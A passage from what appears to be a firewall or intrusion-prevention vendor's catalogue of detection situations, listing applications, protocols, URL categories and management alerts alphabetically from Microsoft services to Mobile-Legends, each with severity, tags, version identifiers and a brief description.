Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-677-5211
Last changed: sgpkg-ips-1814-5242
Description: Microsoft collects telemetry and data about it's users. The feature was introduced with the release of Windows 10 and added as an update to Windows 7, Windows 8, Windows Server 2008 R2 and Windows Server 2012 R2.
Back to top

Microsoft-Telephony-Remote-Protocol

About this situation: Microsoft Telephony Remote Protocol usage
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-759-5211
Description: The Microsoft Telephony Application Programming Interface (TAPI) enables implementation of communications applications ranging from voice mail to call centers with multiple agents and switches. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Telnet-Server-Remote-Administration-Protocol

About this situation: Microsoft Telnet Server Remote Administration Protocol traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Telnet Server Remote Administration Protocol provides a DCOM interface used for performing management tasks on telnet server. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-To-Do

About this situation: Microsoft To Do usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-1300-5242
Last changed: sgpkg-ips-1769-5242
Description: Microsoft To Do is an online task-management service in the Office 365 suite.
Back to top

Microsoft-Translator

About this situation: Microsoft-Translator usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-773-5211
Last changed: sgpkg-ips-773-5211
Description: Microsoft Translator is a multilanguage translation service provided by Microsoft Corporation.
Back to top

Microsoft-Virtual-Disk-Service-Protocol

About this situation: Microsoft Virtual Disk Service Protocol usage
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Virtual Disk Service (VDS) Remote Protocol is a set of Distributed Component Object Model (DCOM) interfaces for managing the configuration of disk storage on a computer. The Virtual Disk Service Remote Protocol deals with detailed low-level operating system and storage concepts. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Visual-Studio

About this situation: Microsoft Visual Studio usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-1814-5242
Description: Microsoft Visual Studio usage detected. Visual Studio is a development platform for Microsoft Windows.
Back to top

Microsoft-W32Time-Remote-Protocol

About this situation: Microsoft W32Time Remote Protocol usage
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft W32Time Remote Protocol is a remote procedure call (RPC) interface for controlling and monitoring a time service that implements the Network Time Protocol (NTP) Authentication Extensions. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Whiteboard

About this situation: Microsoft Whiteboard usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-1300-5242
Last changed: sgpkg-ips-1769-5242
Description: Microsoft Whiteboard is an interactive whiteboard service in the Office 365 suite.
Back to top

Microsoft-Windows-Activation

About this situation: Microsoft Windows Activation usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-439-4219
Last changed: sgpkg-ips-1238-5242
Description: Microsoft Windows Activation usage has been detected.
Back to top

Microsoft-Windows-Client-Certificate-Enrollment-Protocol

About this situation: Microsoft Windows Client Certificate Enrollment Protocol usage
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Windows Client Certificate Enrollment Protocol consists of a set of DCOM interfaces that allow clients to request various services from a certification authority (CA). These services enable X.509 digital certificate enrollment, issuance, revocation, and property retrieval. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Windows-Deployment-Services-Control-Protocol

About this situation: Microsoft Windows Deployment Services Control Protocol usage
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Windows Deployment Services (WDS) Control Protocol specifies an RPC interface that provides the ability to remotely invoke services provided by WDS Server. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Windows-Download

About this situation: Microsoft Windows download detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-1179-5242
Last changed: sgpkg-ips-1179-5242
Description: Microsoft Windows Download application detects manually downloaded content from the Microsoft download services.
Back to top

Microsoft-Windows-Management-Instrumentation-Remote-Protocol

About this situation: Microsoft Windows Management Instrumentation Remote Protocol
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Windows Management Instrumentation (WMI) Protocol is a client/server-based framework that provides an open and automated means of systems management. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Windows-Messenger-Service

About this situation: Microsoft Windows Messenger traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-759-5211
Description: Microsoft Windows Messenger Service usage.
Back to top

Microsoft-Windows-Phone

About this situation: Microsoft Windows Phone traffic
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-602-5211
Description: Microsoft Windows Phone related traffic detected.
Back to top

Microsoft-Windows-Push-Notification-Service

About this situation: Microsoft Windows Push Notification Service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-1769-5242
Description: Windows Push Notification service usage has been detected.
Back to top

Microsoft-Windows-Remote-Desktop

About this situation: Microsoft Windows Remote Desktop traffic
Context: Application Context
Severity: 1
Tags: Protocols, Remote control, Application Routing
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1678-5242
Description: Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the other computer must run RDP server software. Source: Wikipedia
Back to top

Microsoft-Windows-Remote-Registry-Protocol

About this situation: Microsoft Windows Remote Registry Protocol usage
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Windows Remote Registry Protocol is a remote procedure call (RPC)-based client/server protocol that is used for remotely managing a hierarchical Data Store such as the Windows registry. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Windows-System-Resource-Manager-Protocol

About this situation: Microsoft Windows System Resource Manager (WSRM) Protocol traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Windows System Resource Manager (WSRM) Protocol provides tools for managing processor and memory resources on a computer. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Windows-Update

About this situation: Microsoft Windows Update usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1814-5242
Description: Windows Update is a patch and update maintenance component shipped with the Microsoft Windows operating system since the release of Windows XP. Windows Update also uses the Microsoft Certificate Revocation List service, and some updates might fail if usage of Certificate Revocation List service is not permitted.
Back to top

Microsoft-Windows-Weather

About this situation: Microsoft Windows Weather usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-773-5211
Description: Microsoft Windows operating system contains a built-in weather service based on the current location of the device or user selected region.
Back to top

Microsoft-Workstation-Service-Remote-Protocol

About this situation: Microsoft Workstation Service Remote Protocol usage
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-759-5211
Description: Microsoft Workstation Service Remote Protocol is based on the Remote Procedure Call (RPC) protocol. It can be used to remotely perform tasks on a computer on a network. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Microsoft-Xbox

About this situation: Microsoft Xbox traffic
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-773-5211
Description: Xbox is Microsoft's game console.
Back to top

Microsoft-Xbox-Downloads

About this situation: Microsoft Xbox download traffic
Context: Application Context
Severity: 1
Tags: Web Applications, Games
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-773-5211
Description: Xbox is Microsoft's game console.
Back to top

Microsoft-Xbox-Live

About this situation: Microsoft Xbox Live traffic
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-1638-5242
Description: Microsoft Xbox Live usage as been detected. Xbox Live is an online service for Microsoft Xbox game console.
Back to top

Microstrategy

About this situation: Application Microstrategy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MicroStrategy is a provider of software platforms for business intelligence
Back to top

Midlandhr

About this situation: Application Midlandhr detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MidlandHR is a provider of Talent Management, HR and Payroll Software and Outsourcing services, supporting over 10 percent of the total UK workforce.
Back to top

Mighty-Commerce

About this situation: Application Mighty-Commerce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mighty Commerce is a full featured platform to build online e-commerce websites to sell products of any type. Product catalog, order processing, analytics.
Back to top

MightyCall

About this situation: Application MightyCall detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MightyCall - virtual phone system lets you run your business from anywhere.
Back to top

Mightytext

About this situation: Application Mightytext detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mightytext allows gather text, sms from computer in one place.
Back to top

MightyUpload

About this situation: Application MightyUpload detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MightyUpload - file upload and share service.
Back to top

Mijura

About this situation: Application Mijura detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mijura is web-based task management software that lets you know exactly what your team is working on. Track tasks, collaborate with your team, manage meetings and generate reports.
Back to top

Mikogo

About this situation: Application Mikogo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mikogo screen sharing for online meetings and web conferencing,
Back to top

Milestone-Planner

About this situation: Application Milestone-Planner detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: It's business planning and project management, without the hassle. Actions (tasks and todo lists), Milestones, Workstreams and Goals. Integrate with your desktop calendar, and sign in via email, twitter, google or browser id.
Back to top

Milestonesys

About this situation: Application Milestonesys detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Milestone Systems is the provider of open platform IP video surveillance software. Milestone has led the way in providing easy-to-use, powerful video management software
Back to top

Militancy and Extremist

About this situation: Sites that offer information about or promote or are sponsored by groups advocating antigovernment beliefs or action.
Context: URL Application Context
Severity: 1
Tags: Militancy and Extremist, Legal Liability
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that offer information about or promote or are sponsored by groups advocating antigovernment beliefs or action.
Back to top

Military

About this situation: Sites sponsored by branches or agencies of the armed services.
Context: URL Application Context
Severity: 1
Tags: Government, Business Usage, Private Data
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites sponsored by branches or agencies of the armed services.
Back to top

MilitaryHire

About this situation: Application MilitaryHire detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MilitaryHire site for Hiring Managers to find qualified, experienced Military Veterans who are seeking employment. Contains thousands of resumes and jobs and a wealth of information to help the veteran in a career transition.
Back to top

Mimecast

About this situation: Application Mimecast detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mimecast helps organizations and businesses of all sizes to protect their users and data from security threats, and to archive all their human-generated data - from voice, through email, to files and IM - in a compliant, cloud-based archive.
Back to top

MiMedia

About this situation: MiMedia usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-565-5211
Last changed: sgpkg-ips-629-5211
Description: MiMedia is an online cloud storage and file sharing service that helps users to store, share, backup or restore files.
Back to top

Mimeo

About this situation: Application Mimeo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mimeo is on-demand cloud printing service and online printing company offering digital distribution and printing solutions.
Back to top

Mind42

About this situation: Application Mind42 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mind42 is an online mind-mapping tool which allows you to manage all your ideas, whether alone, twosome or working together with the whole world.
Back to top

MindBody

About this situation: Application MindBody detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MINDBODY technology that links tens of thousands of health, wellness, and beauty professionals to the millions of clients they serve.
Back to top

Mindenkilapja

About this situation: Application Mindenkilapja detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mindenkilapja gives a possibility of providing free web presence. The idea is to help everyone to easily create a custom Web page itself without either a computer or programming pre-training.
Back to top

Mindflash

About this situation: Application Mindflash detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MindFlash provides a web platform for companies to share knowledge and train employees. It handles the testing, content management, course management, and reporting.
Back to top

Mindjet

About this situation: Application Mindjet detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mindjet provides the framework needed to build sustainable, predictable, and repeatable innovation process.
Back to top

Mindlogicx

About this situation: Application Mindlogicx detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mindlogicx operates in the broader domain of KPO
Back to top

MindMeister

About this situation: Application MindMeister detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MindMeister is an online mind mapping software, it also includes apps for iPhone, iPad and Android.
Back to top

Mindomo

About this situation: Application Mindomo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mindomo is an online mind map Software where users can create, view and share mind maps in their browser.
Back to top

Mindsalt

About this situation: MindSalt usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: MindSalt is a web-based timesheet and expense tracking software for managing projects, payroll, billing and invoicing.
Back to top

Mindseyesolutions

About this situation: Application Mindseyesolutions detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mindseye is a provider of eDiscovery software solutions. The company's discovery platform provides organizations with a single unified view of their corporate information. Mindseye's industry search and analysis capabilities visually connect key patterns, relationships, and concepts to enable an in-depth understanding of the facts in a matter of hours instead of weeks.
Back to top

MindTickle

About this situation: Application MindTickle detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MindTickle's online training software is a complete cloud-based training and mobile training solution. Create, share and measure training effectivness.
Back to top

MindTools

About this situation: Application MindTools detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MindTools is an available management and leadership training. MindTools offers a catalog of proven management and leadership learning resources.
Back to top

MindTouch

About this situation: Application MindTouch detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MindTouch is a cloud based self-service help center and a knowledge-as-a-service platform that prevents support requests and improves your existing customer support systems.
Back to top

Minecraft

About this situation: Endpoint Context Agent based Minecraft
Context: EI Correlation
Severity: 1
Tags: Gaming, Endpoint
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Minecraft endpoint application has been detected.
Back to top

Minecraft

About this situation: Minecraft usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This game allows players to build constructions out of cubes in a 3D world. Source: Wikipedia.org
Back to top

Mineful

About this situation: Application Mineful detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mineful is a web-based tool that answers questions about how to make your marketing efforts more successful. Mineful gives businesses a way to integrate feedback, customer, and sales data.
Back to top

MineralTree

About this situation: Application MineralTree detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MineralTree Secure Business Pay product sits between your Accounting/ERP system and your bank, with no changes required of you, and adds features like invoice approval, payment approval, dual controls, and payment insurance once your approval on each payment is made.
Back to top

Miniclip

About this situation: MiniClip usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Mininova

About this situation: mininova usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, P2P, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A p2p download service that allows users to search for torrent files for various types of content such as pirated software, movies, and music.
Back to top

miniOrange

About this situation: Application miniOrange detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: miniOrange - Provides secure access to any cloud,web and legacy app with strong authentication methods and single sign on to any enterprise application.
Back to top

Mint

About this situation: Application Mint detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mint helps to manage money, pay bills and track credit score.
Back to top

Mint.com

About this situation: Mint.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-641-5211
Description: Mint does all the work of organizing and categorizing finances for user. Mint automatically organizes your spending into categories like rent, gas, clothes, latte and shows where users money goes in easy-to-understand charts.
Back to top

Minubo

About this situation: Application Minubo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Minubo is an ecommerce intelligence as a service solution that helps online retailers drive growth by converting data into action.
Back to top

Minus

About this situation: Minus usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-623-5211
Description: Minus is a web based photo sharing service that allows users to upload and share their photos.
Back to top

Minute7

About this situation: Application Minute7 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Minute7 offers a complete cloud-based time and expense tracking solution for QuickBooks, enabling employees and contractors to enter time and expenses directly into their web browsers or mobile devices. A one-click sync then transfers everything to QuickBooks
Back to top

MinuteDock

About this situation: Application MinuteDock detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MinuteDock provides suite of tools for time tracking, invoicing, reports, contacts, projects and tasks.
Back to top

MIR3

About this situation: Application MIR3 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MIR3 handles collaboration complex tasks, rapidly launching a message to groups of any size, whether it is in one location or spread all over the world.
Back to top

Mirashare

About this situation: Application Mirashare detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mirashare provides solution for EHS management that operates in the cloud.
Back to top

mIRC

About this situation: Endpoint Context Agent based mIRC
Context: EI Correlation
Severity: 1
Tags: IM, Endpoint
First detected in: sgpkg-ips-1570-5242
Last changed: sgpkg-ips-1570-5242
Description: mIRC endpoint application has been detected.
Back to top

Miro

About this situation: Miro usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1223-5242
Description: Miro is a free integrated application that can download and play videos, podcasts and audios from the Internet. It allows users to manage the downloaded videos and audios and also to share it with other computers and tablets within the local network.
Back to top

MIRS

About this situation: Application MIRS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MIRS provides track and report EHandS compliance software for organization.
Back to top

Mirus

About this situation: Application Mirus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MIRUS Restaurant Solutions provides reporting and analysis solutions that helps restaurants organize and realize the potential savings and profits of their business.
Back to top

Miscellaneous

About this situation: The parent category that contains the following categories: Content Delivery Networks, Dynamic Content, File Download Servers, Network Errors, Private IP Addresses, Uncategorized, Web Images and Web Infrastructure.
Context: URL Application Context
Severity: 1
Tags: Miscellaneous
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The parent category that contains the following categories: Content Delivery Networks, Dynamic Content, File Download Servers, Network Errors, Private IP Addresses, Uncategorized, Web Images and Web Infrastructure.
Back to top

MissLee

About this situation: MissLee usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-710-5211
Description: MissLee is a Korean chat application.
Back to top

Misys

About this situation: Application Misys detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Misys is transforming the financial services industry by making clients more resilient, more efficient and more competitive.
Back to top

mite

About this situation: Application mite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: mite is a web-based tool for freelancers and small teams to track and analyze working hours.
Back to top

MITS-Distributor-Analytics

About this situation: Application MITS-Distributor-Analytics detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MITS - web-based reporting business intelligence software for wholesale distributors manufacturers.
Back to top

Mixcloud

About this situation: Mixcloud usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1764-5242
Description: is a Internet radio, it also allows to upload and share files.
Back to top

Mixi

About this situation: mixi usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a Japanese social networking service that allows users to send and receive messages, organize and join communities, write and read diaries, and invite friends. Source: Wikipedia
Back to top

MixMobi

About this situation: Application MixMobi detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MixMobi is a web-based application to create QR enabled DIY mobile coupons, offers, microsites to put your message in your customers' hands.
Back to top

Mixpanel

About this situation: Mixpanel usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Mixpanel quickly creates, target and send mobile surveys directly to the mobile users.
Back to top

Mixxchannels

About this situation: mixxchannels usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a global social media site that allows users to submit or find content by peers based on interest and location. It combines social networking and bookmarking with web syndication, blogging and personalization tools. Source: Wikipedia
Back to top

Mlb.tv

About this situation: MLB.tv usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: MLB.tv is a subscription service which allows users to view games live, streamed through an internet browser (or MLB.tv Mosaic, see below) or PlayStation 3 console. Source: Wikipedia
Back to top

MLC Certificate expires soon

About this situation: The MLC certificate expires soon. Check if the MLC certificate has been renewed.
Context: Management Server situation
Severity: 3
Tags: Upcoming Events
First detected in: sgpkg-ips-1423-5242
Last changed: sgpkg-ips-1535-5242
Description:
Back to top

MLC Certificate has expired

About this situation: The MLC certificate has expired. Check if the MLC certificate has been renewed.
Context: Management Server situation
Severity: 7
Tags: SMC
First detected in: sgpkg-ips-1423-5242
Last changed: sgpkg-ips-1643-5242
Description:
Back to top

MLC_Connection_switchover

About this situation: Connection switchover
Context: MLC
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-594-5211
Last changed: sgpkg-ips-1531-5242
Description: A switchover has occurred: a connection to an MLC server on another host has been established.
Back to top

MLC_Connection_to_mlc_established

About this situation: Connection to MLC established
Context: MLC
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-594-5211
Last changed: sgpkg-ips-1531-5242
Description: A connection to an MLC server has been established.
Back to top

MLC_Connection_to_mlc_lost

About this situation: Connection to MLC lost
Context: MLC
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-594-5211
Last changed: sgpkg-ips-1531-5242
Description: A connection to an MLC server has been lost.
Back to top

Moat

About this situation: Moat usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Description: Moat is a web advertising service that provides for example a search engine for display ads.
Back to top

Mobile Malware

About this situation: Protects against malicious websites and applications designed to run on mobile devices.
Context: URL Application Context
Severity: 1
Tags: Security, Security Risk
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Protects against malicious websites and applications designed to run on mobile devices.
Back to top

Mobile-Field-Report

About this situation: Application Mobile-Field-Report detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Software for Field Service Companies - reporting in the field. Job tracking, Scheduling and Reporting in one service tool. Designed for iPad.
Back to top

Mobile-Forms

About this situation: Application Mobile-Forms detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mobile Forms replaces clipboards and paper-based workflows with an online tool to build your solution, accompanied by a rich set of apps for iPhone, iPad, Android devices and tablets and BlackBerry.
Back to top

Mobile-Legends

About this situation: Mobile Legends game traffic detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-1131-5242
Last changed: sgpkg-ips-1131-5242
Description: Mobile Legends is a mobile multiplayer online game developed by Moonton.
Back to top

Mobile-Time-Sheets-App

